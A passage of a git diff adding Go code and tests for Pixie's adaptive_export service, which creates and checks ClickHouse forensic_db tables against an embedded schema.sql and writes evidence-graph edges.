License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "strings" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp" +) + +// OperatorOwnedTables is the subset of KnownTables the adaptive_export +// operator creates on boot. Kubescape tables (alerts, kubescape_logs) +// are NOT here — they are owned by the soc/tree/clickhouse-lab +// installer. Order matters: adaptive_attribution last so it does not +// reference any pixie table during creation (it does not, but the +// invariant is cheap to keep). +var OperatorOwnedTables = []string{ + // 12 pixie socket_tracer tables — created BEFORE Pixie's retention + // plugin gets a chance to auto-DDL them (which would omit our + // namespace + pod columns and break analyst JOINs). + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // conn_stats — pixie observation table; created in the + // same boot pass as the others so Apply (here) and Verify (KnownTables + // in ddl.go) can't drift. The drift was a real regression: aeprod3/4/5 + // shipped with this list at 14 entries while ddl.go's KnownTables had 15, + // so Apply created 14 tables on fresh install and Verify failed at boot + // with "conn_stats schema drift, missing columns". Locked down by + // TestOperatorOwnedTables_CoversAllPixieTables in apply_test.go. + "conn_stats", + // operator's write targets. + "adaptive_attribution", + "trigger_watermark", + // per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). Created on + // boot so a reconcile run has a target without manual DDL. Not a pixie + // table → not in PixieTables(), so VerifyPixieSchema ignores it. + "ae_reconcile", + // dx evidence-graph edge list — created on boot so the Pixie + // dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real, + // globally-registered table to read. dx emits edges, AE persists. + // Not a pixie socket_tracer table → not in PixieTables(). + "dx_attack_graph", + // rule-ins-only VIEW over dx_attack_graph; created AFTER it (depends on it). + "dx_attack_graph_malicious", +} + +// Applier applies operator-owned DDL to a ClickHouse cluster over the +// HTTP interface (default 8123). Used at boot. +type Applier struct { + c *chhttp.Client +} + +// NewApplier validates the endpoint and returns a ready Applier. +func NewApplier(endpoint, user, pass string) (*Applier, error) { + c, err := chhttp.New(endpoint, user, pass, 0) + if err != nil { + return nil, fmt.Errorf("clickhouse: %w", err) + } + return &Applier{c: c}, nil +} + +// Apply ensures forensic_db exists, then runs CREATE TABLE IF NOT +// EXISTS for every OperatorOwnedTables entry in declared order. +// Idempotent. Returns the first error encountered without continuing — +// callers should treat schema apply as a precondition for the rest of +// boot. +func (a *Applier) Apply(ctx context.Context) error { + if err := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); err != nil { + return fmt.Errorf("apply: create database forensic_db: %w", err) + } + for _, table := range OperatorOwnedTables { + ddl, err := DDL(table) + if err != nil { + return fmt.Errorf("apply: get DDL for %s: %w", table, err) + } + if err := a.execute(ctx, ddl); err != nil { + return fmt.Errorf("apply: create %s: %w", table, err) + } + } + return nil +} + +// WriteAttackGraph inserts dx evidence-graph edges into +// forensic_db.dx_attack_graph. jsonEachRow is newline-delimited JSON objects +// whose keys are the column names (JSONEachRow; unknown keys are skipped, +// missing columns default). No-op on empty input. +func (a *Applier) WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error { + if len(jsonEachRow) == 0 { + return nil + } + _, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_attack_graph FORMAT JSONEachRow", + jsonEachRow, chhttp.InsertOptions{}) + return err +} + +// execute is the DDL primitive — used by Apply for CREATE statements. +func (a *Applier) execute(ctx context.Context, sql string) error { + _, err := a.c.Exec(ctx, sql) + return err +} + +// SchemaDriftError is returned by VerifyPixieSchema when a pixie +// observation table is missing one or more of the operator-required +// columns. errors.Is-friendly. +type SchemaDriftError struct { + Table string + Missing []string +} + +func (e *SchemaDriftError) Error() string { + return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s", + e.Table, strings.Join(e.Missing, ", ")) +} + +// requiredPixieColumns are the columns every pixie observation table +// MUST have for adaptive_attribution JOINs to work. namespace + pod are +// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own +// canonical columns we depend on. +var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"} + +// VerifyPixieSchema queries system.columns for each pixie observation +// table and confirms EVERY column AE writes for that table is present +// in CH. This is the **writer ⇔ schema contract** test (the T1 in +// the operator's PR #47 schema-loss report on 2026-06-07). +// +// The earlier shape of this function only checked the 4 +// operator-required columns (namespace/pod/hostname/time_) — a table +// could be hand-created with those four plus a different subset of +// data columns and pass verification, while AE's writer would post +// JSON containing the column names schema.sql says the table should +// have. The result on rig 6a25c85c: CH silently dropped 22 of 24 +// columns into nothing because they were "unknown fields" +// (input_format_skip_unknown_fields default = 1), AE's +// summaryWroteFewerThan saw written_rows=0 / rows_sent=259 only AFTER +// the data was lost, and the controller hot-looped on the rejection. +// +// The expanded contract: for every table in PixieTables(), CH's +// actual column set must be a superset of clickhouse.Columns(table) — +// i.e. the canonical column list parsed out of schema.sql, which IS +// the single source of truth. +// +// Returns the FIRST drift detected as *SchemaDriftError. Callers +// usually want to log loudly and refuse to start so the misconfig +// is visible — silently continuing leaves the table with a schema +// the AE writer can't actually populate. +func (a *Applier) VerifyPixieSchema(ctx context.Context) error { + for _, table := range PixieTables() { + actual, err := a.tableColumns(ctx, table) + if err != nil { + return fmt.Errorf("verify %s: %w", table, err) + } + // The canonical column shape AE expects (schema.sql). + want, err := Columns(table) + if err != nil { + return fmt.Errorf("verify %s: load expected columns: %w", table, err) + } + // Operator-required + canonical union, deduped. + need := make([]string, 0, len(want)+len(requiredPixieColumns)) + seen := map[string]bool{} + for _, c := range want { + if !seen[c] { + seen[c] = true + need = append(need, c) + } + } + for _, c := range requiredPixieColumns { + if !seen[c] { + seen[c] = true + need = append(need, c) + } + } + var missing []string + for _, w := range need { + if !contains(actual, w) { + missing = append(missing, w) + } + } + if len(missing) > 0 { + return &SchemaDriftError{Table: table, Missing: missing} + } + } + return nil +} + +// tableColumns lists the column names of forensic_db.
as +// reported by system.columns. +func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) { + body, err := a.c.Query(ctx, fmt.Sprintf( + "SELECT name FROM system.columns WHERE database='forensic_db' AND table=%s FORMAT JSONEachRow", + quoteCH(table))) + if err != nil { + return nil, err + } + type row struct { + Name string `json:"name"` + } + var out []string + for _, line := range bytes.Split(body, []byte{'\n'}) { + line = bytes.TrimSpace(line) + if len(line) == 0 { + continue + } + var r row + if err := json.Unmarshal(line, &r); err != nil { + return nil, fmt.Errorf("parse system.columns row: %w", err) + } + out = append(out, r.Name) + } + return out, nil +} + +func quoteCH(s string) string { + r := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s) + return "'" + r + "'" +} + +func contains(s []string, x string) bool { + for _, v := range s { + if v == x { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go new file mode 100644 index 00000000000..e108e05540c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go @@ -0,0 +1,266 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "context" + "errors" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "sync/atomic" + "testing" +) + +// TestApply_ExecutesEveryOperatorOwnedTable — Apply POSTs one DDL per +// table in OperatorOwnedTables, in order. None of the kubescape tables +// (alerts, kubescape_logs) are touched — those belong to the soc installer. +func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) { + var mu sync.Mutex + var bodies []string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + b, _ := io.ReadAll(r.Body) + mu.Lock() + bodies = append(bodies, string(b)) + mu.Unlock() + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err != nil { + t.Fatalf("Apply: %v", err) + } + // 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls. + if got, want := len(bodies), len(OperatorOwnedTables)+1; got != want { + t.Fatalf("Apply made %d calls, want %d", got, want) + } + if !strings.Contains(bodies[0], "CREATE DATABASE IF NOT EXISTS forensic_db") { + t.Fatalf("first DDL must create the database; got: %s", bodies[0]) + } + // Spot-check that the SECOND call is for the first OperatorOwnedTables entry, + // and that the LAST call is for the last OperatorOwnedTables entry (robust to + // new operator-owned tables being appended, e.g. dx_attack_graph). + if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) { + t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1]) + } + lastTable := OperatorOwnedTables[len(OperatorOwnedTables)-1] + if !strings.Contains(bodies[len(bodies)-1], "forensic_db."+lastTable) { + t.Fatalf("last DDL not for %s; got: %s", lastTable, bodies[len(bodies)-1]) + } + // And ensure no kubescape DDL leaked through. + for _, b := range bodies { + if strings.Contains(b, "forensic_db.alerts") || strings.Contains(b, "forensic_db.kubescape_logs") { + t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", b) + } + } +} + +// TestApply_FailsFastOnHTTPError — if any CREATE returns non-2xx, +// Apply returns immediately without attempting later tables. +func TestApply_FailsFastOnHTTPError(t *testing.T) { + // atomic.Int32 because httptest's handler runs on its own goroutine + // while the test goroutine reads `calls` after Apply returns — + // without atomic the -race detector flags a data race even though + // the goroutines are happens-before-ordered by Apply's HTTP response. + var calls atomic.Int32 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := calls.Add(1) + if n == 1 { + w.WriteHeader(500) + _, _ = w.Write([]byte("ddl exploded")) + return + } + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err == nil { + t.Fatalf("expected error from Apply on HTTP 500") + } + if got := calls.Load(); got != 1 { + t.Fatalf("Apply continued past first failure; calls = %d", got) + } +} + +// tableForQuery extracts the table name from a system.columns query +// like "...AND table='http_events' FORMAT JSONEachRow". +func tableForQuery(q string) string { + const marker = "table='" + i := strings.Index(q, marker) + if i < 0 { + return "" + } + rest := q[i+len(marker):] + j := strings.Index(rest, "'") + if j < 0 { + return "" + } + return rest[:j] +} + +// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard. +// On rig 6a25c85c (PR #47 schema-loss report), http_events was created +// by a hand-maintained stopgap that DIDN'T include req_path / +// req_headers / etc. — the columns AE's writer puts into JSONEachRow +// posts. The old VerifyPixieSchema only checked namespace/pod/hostname/ +// time_, so it passed; the writer's 22 unknown fields then got silently +// dropped by CH at default settings. The expanded contract verifies +// EVERY column AE expects per table is present in CH (the writer ⇔ +// schema contract). This test reproduces the rig 6a25c85c shape: +// http_events comes back with the 4 operator-required columns but +// missing the data columns the writer fills. +func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Return only the operator-required columns for the first pixie + // table iterated; that's the regression shape — looks "valid" + // to the old checker but fails the writer-column union. + table := tableForQuery(r.URL.Query().Get("query")) + if table == "http_events" { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + return + } + // Other tables (won't be reached) — fully populated. + cols, _ := Columns(table) + for _, c := range cols { + fmt.Fprintf(w, "{\"name\":%q}\n", c) + } + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + err = a.VerifyPixieSchema(context.Background()) + if err == nil { + t.Fatalf("expected SchemaDriftError; got nil") + } + var drift *SchemaDriftError + if !errors.As(err, &drift) { + t.Fatalf("err type = %T, want *SchemaDriftError", err) + } + if drift.Table != "http_events" { + t.Fatalf("first drift = %q, want http_events", drift.Table) + } + // Spot-check that several of the data columns the writer fills are + // flagged missing — that's the new coverage vs the old 4-column + // check. + for _, want := range []string{"req_path", "req_headers", "resp_status", "latency"} { + if !contains(drift.Missing, want) { + t.Errorf("Missing should include %q (writer-column drift); got %v", want, drift.Missing) + } + } +} + +// TestVerifyPixieSchema_AllPresent — happy path. The mock server returns +// the FULL schema.sql column shape for each table, so VerifyPixieSchema +// confirms the writer ⇔ schema contract holds and returns nil. +func TestVerifyPixieSchema_AllPresent(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + table := tableForQuery(r.URL.Query().Get("query")) + cols, err := Columns(table) + if err != nil { + http.Error(w, err.Error(), 500) + return + } + for _, c := range cols { + fmt.Fprintf(w, "{\"name\":%q}\n", c) + } + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.VerifyPixieSchema(context.Background()); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} + +// TestNewApplier_RejectsBadEndpoint — defensive contract. +func TestNewApplier_RejectsBadEndpoint(t *testing.T) { + if _, err := NewApplier("", "", ""); err == nil { + t.Fatalf("empty endpoint not rejected") + } + if _, err := NewApplier("http://%zz", "", ""); err == nil { + t.Fatalf("malformed endpoint not rejected") + } +} + +// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard: +// the operator never owns kubescape tables. +func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) { + for _, x := range []string{"alerts", "kubescape_logs"} { + if contains(OperatorOwnedTables, x) { + t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", x) + } + } +} + +// TestOperatorOwnedTables_TrailingOperatorTables — ordering guard. +// pixie observation tables come first (so they exist before the retention +// plugin can auto-DDL them with the wrong schema), then the operator's +// own write targets in declared order. +func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) { + want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph", "dx_attack_graph_malicious"} + got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):] + for i, w := range want { + if got[i] != w { + t.Fatalf("OperatorOwnedTables tail = %v, want %v", got, want) + } + } +} + +// TestOperatorOwnedTables_CoversAllPixieTables — drift guard between the +// boot-time Apply (OperatorOwnedTables, this file) and the verify path +// that uses ddl.go's KnownTables / PixieTables. aeprod3/4/5 shipped with +// the two lists out of sync: ddl.go's PixieTables() included "conn_stats" +// (re-added in commit a54a1f6d3) but OperatorOwnedTables +// did not, so Apply created 14 tables and Verify expected 15 — AE fatal'd +// at boot with `pixie table schema drift detected … conn_stats schema +// drift, missing columns`. Anyone adding a new pixie observation table in +// the future MUST add it to both lists; this test fails loudly otherwise. +func TestOperatorOwnedTables_CoversAllPixieTables(t *testing.T) { + owned := map[string]bool{} + for _, n := range OperatorOwnedTables { + owned[n] = true + } + var missing []string + for _, p := range PixieTables() { + if !owned[p] { + missing = append(missing, p) + } + } + if len(missing) > 0 { + t.Fatalf("PixieTables() not covered by OperatorOwnedTables: %v "+ + "(adding a pixie table requires updating BOTH apply.go OperatorOwnedTables "+ + "and ddl.go KnownTables+PixieTables — drift causes the boot-time schema "+ + "verify to fail with \"missing columns\")", missing) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go new file mode 100644 index 00000000000..2e3a94bfb73 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go @@ -0,0 +1,130 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "reflect" + "strings" + "testing" +) + +// http_events is the shape AE writes most often (and the bench shape). +// Pin the exact ordered column list so a schema.sql edit that drops or +// reorders a column trips this test loudly. +func TestColumns_http_events_ExactList(t *testing.T) { + got, err := Columns("http_events") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "time_", "upid", "namespace", "pod", + "remote_addr", "remote_port", "local_addr", "local_port", + "trace_role", "encrypted", "major_version", "minor_version", + "content_type", "req_headers", "req_method", "req_path", + "req_body", "req_body_size", "resp_headers", "resp_status", + "resp_message", "resp_body", "resp_body_size", "latency", + "hostname", "event_time", + } + if !reflect.DeepEqual(got, want) { + t.Fatalf("Columns(http_events) mismatch:\n got=%v\nwant=%v", got, want) + } +} + +// conn_stats is the column shape pinned by the rev-2 schema; if anyone +// drops or renames a column the bench-encoder fast-path would silently +// emit the wrong JSON, so this guard is mandatory. +func TestColumns_conn_stats_ExactList(t *testing.T) { + got, err := Columns("conn_stats") + if err != nil { + t.Fatalf("Columns: %v", err) + } + want := []string{ + "time_", "upid", "namespace", "pod", + "remote_addr", "remote_port", "trace_role", "addr_family", + "protocol", "ssl", "conn_open", "conn_close", "conn_active", + "bytes_sent", "bytes_recv", "hostname", "event_time", + } + if !reflect.DeepEqual(got, want) { + t.Fatalf("Columns(conn_stats) mismatch:\n got=%v\nwant=%v", got, want) + } +} + +// Every table in PixieTables() must successfully parse, and each must +// include the operator-mandated namespace + pod columns plus the +// retention-plugin-mandated hostname + event_time columns. +func TestColumns_AllPixieTables_HaveOperatorColumns(t *testing.T) { + for _, table := range PixieTables() { + cols, err := Columns(table) + if err != nil { + t.Errorf("Columns(%q): %v", table, err) + continue + } + for _, required := range []string{"namespace", "pod", "hostname", "event_time"} { + found := false + for _, c := range cols { + if c == required { + found = true + break + } + } + if !found { + t.Errorf("Columns(%q) missing required column %q (cols=%v)", table, required, cols) + } + } + } +} + +// Backtick-quoted (dotted) tables also resolve. +func TestColumns_DottedTables(t *testing.T) { + for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} { + got, err := Columns(table) + if err != nil { + t.Errorf("Columns(%q): %v", table, err) + continue + } + if len(got) == 0 { + t.Errorf("Columns(%q): empty", table) + } + } +} + +// Unknown tables return ErrUnknownTable so callers (sink) can fall +// back to the encoding/json slow path safely. +func TestColumns_UnknownTable_ErrUnknownTable(t *testing.T) { + _, err := Columns("not_a_real_table") + if err == nil || !strings.Contains(err.Error(), "unknown table") { + t.Fatalf("expected ErrUnknownTable for unknown table, got %v", err) + } +} + +// Repeated lookups for the same table return the same content. (The +// underlying parser may or may not cache — the sink's fast-path +// encoder caches the column slice itself once per table; what we test +// here is that the public Columns() answer is stable.) +func TestColumns_Repeated_StableResult(t *testing.T) { + a, err := Columns("dns_events") + if err != nil { + t.Fatal(err) + } + b, err := Columns("dns_events") + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(a, b) { + t.Fatalf("Columns(dns_events) drift across calls: a=%v b=%v", a, b) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go new file mode 100644 index 00000000000..e4503bb340c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go @@ -0,0 +1,137 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package clickhouse owns the canonical ClickHouse DDL for the +// forensic_db tables that adaptive_export reads (kubescape_logs) and +// the 12 socket_tracer tables Pixie's retention plugin writes (which +// the operator joins against via forensic_db.adaptive_attribution). +// +// schema.sql is the single source of truth. The operator never invents +// SQL — it always extracts statements verbatim from the embedded copy. +package clickhouse + +import ( + _ "embed" + "errors" + "fmt" + "strings" +) + +//go:embed schema.sql +var canonicalSchema string + +// KnownTables enumerates every forensic_db table the operator is aware +// of, in the order they appear in schema.sql. Backtick-quoted table +// names (those containing dots, e.g. "http2_messages.beta") are listed +// here without backticks; DDL() reinjects them. +var KnownTables = []string{ + // non-pixie + "alerts", + "kubescape_logs", + // 12 socket_tracer pixie observation tables + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // conn_stats — re-added to rev-2 schema; counts per + // (remote_addr, remote_port, protocol) on each retention-script pull. + "conn_stats", + // operator-owned attribution table + "adaptive_attribution", + // operator-owned persistent trigger cursor + "trigger_watermark", + // operator-owned per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). + // NOT a pixie table — absent from PixieTables(). + "ae_reconcile", + // operator-owned dx evidence-graph edge list (read by the Pixie + // dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table. + "dx_attack_graph", + // rule-ins-only VIEW over dx_attack_graph (condition != ''); the + // dx_evidence_graph UI reads this by default so benign rows are filtered + // in ClickHouse, not pulled. Must follow dx_attack_graph (depends on it). + "dx_attack_graph_malicious", +} + +// ErrUnknownTable is returned by DDL / Columns when asked for a table +// not in KnownTables. +var ErrUnknownTable = errors.New("clickhouse: unknown table") + +// DDL returns the canonical CREATE TABLE statement for the named table, +// extracted from the embedded schema.sql. +func DDL(table string) (string, error) { + if !isKnown(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // ClickHouse identifiers containing a dot must be backtick-quoted. + // Build the right header for the lookup. + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + start := -1 + for _, kw := range []string{"CREATE TABLE IF NOT EXISTS forensic_db.", "CREATE VIEW IF NOT EXISTS forensic_db."} { + if start = strings.Index(canonicalSchema, kw+identifier); start >= 0 { + break + } + } + if start < 0 { + return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table) + } + rest := canonicalSchema[start:] + semi := strings.Index(rest, ";") + if semi < 0 { + return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table) + } + return rest[:semi+1], nil +} + +// PixieTables returns the subset of KnownTables that are pixie +// socket_tracer observation tables (the JOIN targets for +// adaptive_attribution). +func PixieTables() []string { + return []string{ + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + "conn_stats", + } +} + +func isKnown(name string) bool { + for _, t := range KnownTables { + if t == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go new file mode 100644 index 00000000000..0da8c706d3d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go @@ -0,0 +1,143 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestDDL_ReturnsCanonicalForKnownTables — every table named in +// KnownTables can be extracted as a complete CREATE TABLE statement. +func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) { + for _, name := range KnownTables { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.HasPrefix(ddl, "CREATE TABLE IF NOT EXISTS forensic_db.") && + !strings.HasPrefix(ddl, "CREATE VIEW IF NOT EXISTS forensic_db.") { + t.Fatalf("DDL(%q) wrong prefix: %q", name, ddl[:minInt(70, len(ddl))]) + } + if !strings.HasSuffix(ddl, ";") { + t.Fatalf("DDL(%q) does not terminate with ';'", name) + } + }) + } +} + +// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must +// declare namespace + pod columns (used by attribution JOINs). +func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "namespace") { + t.Fatalf("%s missing namespace column", name) + } + if !strings.Contains(ddl, "pod") { + t.Fatalf("%s missing pod column", name) + } + }) + } +} + +// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables +// MUST NOT carry the hash inline; attribution is via JOIN. +func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if strings.Contains(ddl, "anomaly_hash") || strings.Contains(ddl, "anomaly_hashes") { + t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, ddl) + } + }) + } +} + +// TestDDL_AdaptiveAttribution_HasExpectedColumns — the attribution +// table is the operator's only write target. +func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) { + ddl, err := DDL("adaptive_attribution") + if err != nil { + t.Fatalf("DDL: %v", err) + } + for _, c := range []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + } { + if !strings.Contains(ddl, c) { + t.Fatalf("adaptive_attribution missing column %q; got:\n%s", c, ddl) + } + } + if !strings.Contains(ddl, "ReplacingMergeTree(t_end)") { + t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", ddl) + } +} + +// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its +// existing anomaly_hash DEFAULT ” column for pipeline compat. +func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) { + ddl, err := DDL("kubescape_logs") + if err != nil { + t.Fatalf("DDL: %v", err) + } + if !strings.Contains(ddl, "anomaly_hash") { + t.Fatalf("kubescape_logs lost anomaly_hash column: %s", ddl) + } +} + +// TestDDL_UnknownTable_ErrUnknownTable — defensive contract. +func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) { + for _, bad := range []string{"", "no_such_table", "process_events"} { + _, err := DDL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} + +// TestDDL_DottedTableName_BacktickQuoted — schema.sql backtick-quotes +// dotted ClickHouse identifiers. +func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) { + for _, name := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "`"+name+"`") { + t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", name, ddl) + } + }) + } +} + +func minInt(a, b int) int { + if a < b { + return a + } + return b +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go new file mode 100644 index 00000000000..1d76c286760 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "fmt" + "strings" +) + +// Columns returns the column names of forensic_db.
in +// declaration order, parsed from the embedded canonical schema.sql. +// Same defensive contract as DDL: unknown table → ErrUnknownTable. +func Columns(table string) ([]string, error) { + ddl, err := DDL(table) + if err != nil { + return nil, err + } + return parseColumnList(ddl) +} + +// InsertSQL returns the parameterized INSERT for forensic_db.
